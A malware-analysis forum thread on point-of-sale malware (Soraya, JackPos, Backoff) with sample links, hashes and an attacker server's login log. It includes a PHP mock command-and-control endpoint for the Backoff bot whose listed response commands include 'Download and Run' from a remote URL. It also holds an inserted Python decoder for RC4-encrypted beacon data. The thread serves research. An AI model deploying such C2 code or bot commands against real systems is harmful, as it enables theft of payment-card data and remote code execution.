A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23064  by Xylitol
 Sun Jun 08, 2014 8:25 am
Bunch of POS malware in attach (JackPos/Soraya/rdasrv/mmon)...
For SetupX.exe the password of the installer is 'Rome0'; it drops mmon and rdasrv into /system32/
http://vxvault.siri-urz.net/ViriList.ph ... .91.198.91
Code:
Uname: Linux rome0.com 2.6.32-29-pve #1 SMP Thu Apr 24 10:03:02 CEST 2014 i686
$ last -f /var/log/wtmp
reboot   system boot  2.6.32-29-pve    Fri May 16 14:28 - 05:57 (22+15:29)
reboot   system boot  2.6.32-19-pve    Fri May 16 10:26 - 05:57 (22+19:31)
accounts pts/0        37.48.81.44      Thu Apr 24 18:55 - 13:54  (18:59)
reboot   system boot  2.6.32-19-pve    Sat Mar 15 11:08 - 10:07 (61+22:59)
root     pts/0        37.48.81.52      Sat Mar 15 10:56 - down   (00:11)
reboot   system boot  2.6.32-19-pve    Sat Feb 22 09:00 - 11:07 (21+01:07)
root     pts/0        37.48.81.48      Sat Feb 22 07:28 - down   (01:32)
reboot   system boot  2.6.32-19-pve    Sat Feb 22 07:27 - 09:00  (01:32)

wtmp begins Sat Feb 22 07:27:23 2014
Soraya:
https://www.virustotal.com/en/file/a776 ... 402224931/
https://www.virustotal.com/en/file/04b5 ... 402224932/
https://www.virustotal.com/en/file/c1a2 ... 402224934/
https://www.virustotal.com/en/file/33f0 ... 402225093/
https://www.virustotal.com/en/file/0866 ... 402225092/
JackPos:
https://www.virustotal.com/en/file/6347 ... 402225135/
mmon:
https://www.virustotal.com/en/file/7b31 ... 402225162/
bundled installer:
https://www.virustotal.com/en/file/6050 ... 402225205/
 #23108  by nielsgroeneveld
 Fri Jun 13, 2014 7:50 am
It seems a new kind of POS malware is being used at the moment, which is labelled as "POSCLOUD.Backdoor/Agent" by IntelCrawler -

Small businesses running cloud-based POS software hit with unique 'POSCLOUD' malware
http://www.scmagazine.com/small-busines ... le/355301/

Title: Cloud-Based POS Software – “New Target for Hackers?”
Published Date: June 11, 2014
Reference Number: IC-INT-753
http://intelcrawler.com/intel/webpos.pdf

Has anyone seen samples or other relevant information such as MD5 hashes relating to "POSCLOUD"?
 #23323  by EP_X0FF
 Thu Jul 10, 2014 2:51 am
dwsfra wrote: uCare, can you upload the unpacked bins of Soraya?
Thanks
Soyara, not Soraya.
 #23489  by forty-six
 Thu Jul 31, 2014 8:28 pm
Couple of hashes from the article:

F5B4786C28CCF43E569CB21A6122A97E

17E1173F6FC7E920405F8DBDE8C9ECAC
 #23695  by cr33k
 Wed Aug 27, 2014 10:56 am
uCares wrote: Unpacked Backoff 1.55 AERO3
I have been analyzing this bin and have gotten it to connect to my test server and successfully execute the 'Uninstall' and 'Terminate' commands, but the 'Download and Run' and 'Update' commands seem to fail even with a ':' delimiter between command and parameter.

Anyway, I also did a test to see if it could grab track 1/2 data, and it did; however, I am still working on decrypting the sent data. I know it's something along the lines of: RC4_decrypt(base64_decode("encrypteddata"), "rc4key")

but I still can't figure it out.

Anyone?

I have written this script to test communication:
Code:
<?php
// Test C2 endpoint for the Backoff beacon: appends each POST to log.html
// and returns a response body, which is where the command goes back to the bot.

// Beacon fields the bot POSTs; default to '' so a missing key does not raise a notice.
$fields = array('op', 'id', 'ui', 'wv', 'gr', 'bv', 'data');
$in = array();
foreach ($fields as $f) {
	$in[$f] = isset($_POST[$f]) ? $_POST[$f] : '';
}

$File = "log.html";
$Handle = fopen($File, 'a+');
if ($Handle === false) {
	die("cannot open log file");
}

// Escape bot-controlled values before writing HTML so the log viewer cannot be injected.
$Data = "<br><b>New Log:</b><br>";
foreach ($fields as $f) {
	$Data .= htmlspecialchars($in[$f], ENT_QUOTES, 'UTF-8') . "<br>";
}
fwrite($Handle, $Data);
fclose($Handle);

// Command strings tried as the response body (notes from testing):
//      Download and Run:http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe (Not working?why)
//      Uninstall
print "Thanks!";
?>
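An added analyst-side example (not from the post, and not Backoff's own code) that applies the decoding formula cr33k describes, RC4_decrypt(base64_decode(data), key), to a beacon body carrying the fields his test script logs. The RC4 key, the field values and the track-2 string are constructed placeholders; the beacon's real key is not on the page.

```python
import base64
from urllib.parse import parse_qs, urlencode

# Beacon fields the bot POSTs, matching the keys logged by the test script above.
BEACON_FIELDS = ("op", "id", "ui", "wv", "gr", "bv", "data")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_beacon(body: str) -> dict:
    """Split a urlencoded beacon POST body into the fields the bot sends."""
    parsed = parse_qs(body, keep_blank_values=True)
    return {f: parsed.get(f, [""])[0] for f in BEACON_FIELDS}


def decode_beacon_data(body: str, rc4_key: bytes) -> bytes:
    """The post's formula: RC4_decrypt(base64_decode(data), rc4key)."""
    return rc4(rc4_key, base64.b64decode(parse_beacon(body)["data"]))


def encode_beacon_data(plaintext: bytes, rc4_key: bytes) -> str:
    """Inverse direction, used here only to build the constructed sample."""
    return base64.b64encode(rc4(rc4_key, plaintext)).decode("ascii")


# Constructed sample beacon: placeholder key, field values and a fake track-2
# string built on a test PAN, not data from a real infection.
SAMPLE_KEY = b"placeholder-rc4-key"
SAMPLE_TRACK = b";4111111111111111=2512101...?"
SAMPLE_BODY = urlencode({
    "op": "1", "id": "TESTBOT01", "ui": "user@WIN7-POS", "wv": "6.1",
    "gr": "AERO3", "bv": "1.55",
    "data": encode_beacon_data(SAMPLE_TRACK, SAMPLE_KEY),
})
```

Pointing decode_beacon_data at a captured body with the recovered key gives the cleartext; a wrong key yields garbage rather than an error, so check the output for track-format characters.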
 #23698  by cr33k
 Wed Aug 27, 2014 4:23 pm
New piece of malware that's been making news lately for attacking POS terminals over the RDP protocol.

Very detailed analysis here:
Code:
http://www.fireeye.com/blog/technical/botnet-activities-research/2014/07/brutpos-rdp-bruteforcing-botnet-targeting-pos-systems.html
https://www.virustotal.com/en/file/c984 ... 425435172/